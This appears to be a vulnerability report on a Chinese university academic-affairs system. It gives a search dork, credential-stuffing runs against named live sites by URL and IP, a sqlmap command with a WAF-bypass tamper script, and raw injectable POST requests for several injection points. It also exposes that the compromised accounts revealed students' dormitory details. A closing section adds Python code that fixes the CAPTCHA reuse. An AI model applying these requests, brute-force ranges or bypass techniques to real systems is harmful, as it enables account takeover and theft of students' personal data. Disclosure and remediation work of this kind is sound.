### Summary: WAF bypass

### Details:

I. Reusable CAPTCHA leads to credential stuffing

This year, after Gmail abroad and several large domestic e-commerce sites were hit by credential-stuffing attacks, credential stuffing has become a high-severity vulnerability. Through it an attacker can take over large numbers of accounts and use them as a foothold for further attacks. The Qingguo (青果) academic affairs system used by many universities across the country does not invalidate its CAPTCHA after use, so one CAPTCHA can be reused, and after some brute-force enumeration student information can be obtained.

Google: intitle:"学生综合管理系统" inurl:"xsweb" turns up a good number of Qingguo management system installations.

Login page of the main site.

Case 1. http://xsweb.uvu.edu.cn/

First, obtain a student ID through social engineering: http://zhidao.baidu.com/link?url=Yjp5QaLrzSDK9GQUuKROAtvvNH9iRGbqIJ8I7xsfAX0hfyrilWCR2WXsX14deKXmT_iHQggLbBzszA_EeYd9Kq

After logging in, capture the login request, set both the username and the password to 2013100000-2013100410 and brute-force. Of 400+ accounts tried, 300 succeeded.

Logging in as 2013100334:

![q.jpg](https://images.seebug.org/upload/201501/081526518484656465508a8ae42c17ec553b9a64.jpg)

It even shows which dormitory the student lives in:

![q1.jpg](https://images.seebug.org/upload/201501/08152801f46954544ef0ccb8337919679e9e913e.jpg)

Case 2. http://jw.ynjtc.com/xsweb

Simply testing with the password 123456 yields 160 accounts.

There are also 22 accounts whose password is the same as the username.

![q2.jpg](https://images.seebug.org/upload/201501/0815295459bf3ac03fed93e6a85c2af025077c42.jpg)

Case 3. http://219.228.48.108:81/xsweb/

Scanning 110201000-110201999: of 1000 accounts, 100+ have a password equal to the username.

Case 4. http://121.8.99.242/xsweb

![q3.jpg](https://images.seebug.org/upload/201501/081531131df82012a2ac4bc7d63245080d646d4f.jpg)

II. SQL injection [WAF bypass method: --tamper "equaltolike.py"]

0x00 Injection point 1:

![q4.jpg](https://images.seebug.org/upload/201501/08153538e73e924f592c46fd7a60845c6e2e06c8.jpg)

1. http://xsweb.uvu.edu.cn/default.aspx

Click the search button at the top and capture a request like the one below. Running python sqlmap.py -r 1.txt --tamper "equaltolike.py" --is-dba --dbs is enough to get past the WAF.

```
POST /TZJK/ViewHabitusHealthStandard_rpt.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://xsweb.uvu.edu.cn/TZJK/ViewHabitusHealthStandard.aspx
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 12
DNT: 1
Host: xsweb.uvu.edu.cn
Pragma: no-cache
Cookie: safedog-flow-item=784D7EA494F6B01DC142459982879EC4; ASP.NET_SessionId=yb00m5a42vv3uorfpfzbvzy2

type=1&sex=1*
```

![q5.jpg](https://images.seebug.org/upload/201501/081537004f3718ff35da421b617c661d68748081.jpg)

2. http://jw.ynjtc.com/xsweb

![q6.jpg](https://images.seebug.org/upload/201501/081538107980e30a35708aeea059e40a0ddeaaab.jpg)

3. http://219.228.48.108:81/xsweb/

![q7.jpg](https://images.seebug.org/upload/201501/08154147879696c0b55acc4a5e69e93e0949c12e.jpg)

0x01 Injection point 2:

![q8.jpg](https://images.seebug.org/upload/201501/08154414b9451f8c6ed3a7391c6be5d27396894e.jpg)

http://219.228.48.108:81, captured request like the following:

```
POST /xsweb/TZJK/ViewHabitusHealthEducationPlan_rpt.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://219.228.48.108:81/xsweb/TZJK/ViewHabitusHealthEducationPlan.aspx
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 12
DNT: 1
Host: 219.228.48.108:81
Pragma: no-cache
Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup

xn=2012&xq=0*
```

![q9.jpg](https://images.seebug.org/upload/201501/0815452136df43c3655231ccb68f38a4f6e924d2.jpg)

0x02 Injection point 3

![q10.jpg](https://images.seebug.org/upload/201501/08154608e324b497c61b21779b5b56ce1ae5da8a.jpg)

![q11.jpg](https://images.seebug.org/upload/201501/08154643059b22666611f08cc6314a818587ec7e.jpg)

0x03 Injection point 4

![q13.jpg](https://images.seebug.org/upload/201501/0815474403561ce2d481c7734325ccb25800d86c.jpg)

![q12.jpg](https://images.seebug.org/upload/201501/0815475434fb405eb72b930c5519b026573fb2a1.jpg)

0x04 Injection points 5, 6, 7, 8

![q14.jpg](https://images.seebug.org/upload/201501/081549180b2a8d68d8e9209f528c3c53f1170e4c.jpg)

![q15.jpg](https://images.seebug.org/upload/201501/081549310041c9295ee67e962cf923d957209cac.jpg)

![q16.jpg](https://images.seebug.org/upload/201501/0815494241219ea4e443fefdae3f9fe8dd92e9bd.jpg)

![1.jpg](https://images.seebug.org/upload/201501/08154950cfba493e9cd3fa06404ec72c8af5bc71.jpg)

0x05 Injection points 9, 10 [append a ' to the captured request; blind injection with no echo]

![q17.jpg](https://images.seebug.org/upload/201501/081551340a52863345461998eafb55b528202124.jpg)

```
POST /xsweb/SXZZ/ViewMGActivity_rpt.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://219.228.48.108:81/xsweb/SXZZ/ViewMGActivity.aspx
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 16
DNT: 1
Host: 219.228.48.108:81
Pragma: no-cache
Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup

sel_xn=2012*&xq=0
```

![q18.jpg](https://images.seebug.org/upload/201501/08155153954319127b487944140a8b433ab5498b.jpg)

![q19.jpg](https://images.seebug.org/upload/201501/08155222b1dbdae2b0fa70e3db3482a08e42564b.jpg)

```
POST /xsweb/SXZZ/ViewWinActivity_rpt.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://219.228.48.108:81/xsweb/SXZZ/ViewWinActivity.aspx
Accept-Language: zh-Hans-CN,zh-Hans;q=0.8,en-US;q=0.5,en;q=0.3
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MALCJS)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 16
DNT: 1
Host: 219.228.48.108:81
Pragma: no-cache
Cookie: ASP.NET_SessionId=exdzo445xffrfqqfssmmyoup

sel_xn=2012&xq=0
```

![q20.jpg](https://images.seebug.org/upload/201501/08155253e15b2d4ec42ae49502d58d3d3f7c8503.jpg)

### Proof of vulnerability: see the details above.
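The CAPTCHA-reuse flaw in section I is closed by consuming the CAPTCHA on the server exactly once, before the credentials are looked at, so that a single solved CAPTCHA cannot be replayed across a list of username/password pairs. The following is an added example of that check, not code from the Qingguo system; the in-memory session store, the `MAX_FAILED_ATTEMPTS` lockout and the sample user table are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional

MAX_FAILED_ATTEMPTS = 5  # assumption: lock an account after five consecutive failures


@dataclass
class Session:
    captcha: Optional[str] = None  # expected captcha text; None once it has been consumed


@dataclass
class LoginService:
    users: Dict[str, str]                                  # constructed user table (demo only)
    sessions: Dict[str, Session] = field(default_factory=dict)
    failed: Dict[str, int] = field(default_factory=dict)   # consecutive failures per username

    def new_session(self) -> str:
        sid = secrets.token_hex(16)
        self.sessions[sid] = Session()
        return sid

    def issue_captcha(self, sid: str) -> str:
        """Bind a fresh captcha to the session; any earlier captcha is discarded."""
        text = secrets.token_hex(3)  # stands in for the text rendered into the image
        self.sessions[sid].captcha = text
        return text

    def login(self, sid: str, username: str, password: str, captcha: str) -> str:
        sess = self.sessions.get(sid)
        if sess is None:
            return "no_session"
        expected = sess.captcha
        # Consume the captcha first, whatever the outcome of the login.
        # The reported bug is exactly this step missing: the captcha was checked
        # but never cleared, so one solved captcha served every guess in the run.
        sess.captcha = None
        if expected is None or not hmac.compare_digest(expected, captcha):
            return "captcha_invalid"
        if self.failed.get(username, 0) >= MAX_FAILED_ATTEMPTS:
            return "locked"
        stored = self.users.get(username)
        if stored is None or not hmac.compare_digest(stored, password):
            self.failed[username] = self.failed.get(username, 0) + 1
            return "bad_credentials"
        self.failed[username] = 0
        return "ok"


def replay_captcha(svc: LoginService, sid: str, captcha: str,
                   candidates: List[str]) -> List[str]:
    """Try each candidate as both username and password with ONE captcha, the
    pattern of the Intruder run above, and return the outcome of each attempt."""
    return [svc.login(sid, c, c, captcha) for c in candidates]


if __name__ == "__main__":
    svc = LoginService(users={"stu0001": "stu0001"})  # constructed: password == username
    sid = svc.new_session()
    cap = svc.issue_captcha(sid)
    # The first attempt consumes the captcha; every replay is rejected before the
    # credentials are examined, including the guess that would have matched.
    print(replay_captcha(svc, sid, cap, ["stu0000", "stu0001", "stu0002"]))
```

With the fix in place an enumeration run gets one credential check per solved CAPTCHA, and the per-account lockout bounds the guesses that check can make.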